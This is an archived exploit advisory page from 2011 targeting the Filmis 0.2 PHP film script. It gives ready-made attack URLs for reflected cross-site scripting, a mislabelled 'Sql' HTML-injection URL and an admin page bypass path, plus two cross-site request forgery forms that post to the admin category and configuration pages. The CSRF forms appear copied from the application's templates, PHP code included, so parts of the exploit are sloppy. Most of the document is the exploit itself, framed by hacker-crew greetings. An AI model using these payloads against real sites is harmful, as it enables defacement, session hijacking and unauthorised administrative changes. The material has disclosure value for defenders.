exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Filmis 0.2 Cross Site Request Forgery / Cross Site Scripting

Filmis 0.2 Cross Site Request Forgery / Cross Site Scripting
Posted Oct 12, 2011
Authored by indoushka

Filmis version 0.2 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 8b210a5c19e2f2ecfeb38873657519516d2e8337db4f6e5866e719b7d761b20a

Filmis 0.2 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
=========================================
Filmis - Version 0.2 Mullti Vulnerability
=========================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0 . .--. .--. .---. . 1
1 .'| ) ) / | 0
0 | --: --: / .-.| .-. . . 1
1 | ) ) / ( |( ) | | 0
0 '---' `--' `--' ' `-'`-`-'`-`--| 1
1 ; 0
0 Site : 1337day.com `-' 1
1 Support e-mail : submit[at]inj3ct0r.com 0
0 >> Exploit database separated by exploit 1
1 type (local, remote, DoS, etc.) 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1

#######################################################

# Vendor: http://mohshow.fr.cr/forum/downloads/filmis-0.2beta.zip

# Date: 2011-07-27

# Author : indoushka

+++=[ Dz Offenders Cr3w ]=+++

# KedAns-Dz * Caddy-Dz * Kalashinkov3

# Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz

# Contact : ind0ushka@hotmail.com

# Tested on : win SP2 + SP3 Fr / Back | Track 5 fr

########################################################################

# Exploit By indoushka
-------------

XSS :

http://localhost/filmis/index.php?nb=1%3cScRiPt%20%3eprompt%28972579%29%3c%2fScRiPt%3e

Sql :

http://localhost/filmis/index.php?nb=%3Cmarquee%3E%3Ch1%3EHacked%3C/h1%3E%3C/marquee%3E

by Pass :

http://localhost/filmis/admin/header.php

CSRF Add categorie:

<div id="content">
<h1>Ajouter une cat&eacute;gorie</h1>

<form action="http://localhost/filmis/admin/ajouter-categorie.php" method="post">
<fieldset>
<label for="one">Nom de la cat&eacute;gorie</label>
<input type="text" value="" class="small" id="one" name="nom" />
<span>Taper le nom d'une cat&eacute;gorie &agrave; ajouter</span>
<input type="submit" value="Valider" class="submit" />
</fieldset>
</form>


<br class="clear" />
<div class="break"></div>

</div>
===========================
CSRF Add configuration:

<form action="http://localhost/filmis/admin/configuration.php" method="post">
<fieldset>
<label for="titre_site">Nom du site</label>
<input type="text" value="<?php echo desecure($param->info('titre_site')); ?>" class="small" id="titre_site" name="titre_site" />

<label for="url_site">URL du site</label>
<input type="text" value="<?php echo desecure($param->info('url_site')); ?>" class="small" id="url_site" name="url_site" />
<span>URL o&ugrave; est installer Filmis dans votre site. Sans oublier le <i>http://</i> et le <i>/</i> &agrave; la fin.</span>

<label for="description_site">Description du site</label>
<textarea class="large" id="description_site" name="description_site" rows="10"><?php echo desecure($param->info('description_site')); ?></textarea>
<span>Description de votre site afficher dans la page "A propos" et dans la balise META.</span>

<label for="apropos">A propos</label>
<textarea class="large" id="apropos" name="apropos" rows="10"><?php echo desecure($param->info('apropos')); ?></textarea>
<span>Personnalisez la page "A propos" en ajoutant un texte.</span>

<input type="submit" value="Valider" class="submit" />
</fieldset>
</form>


<br class="clear" />
<div class="break"></div>

</div>
Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
---------------------------------------------------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close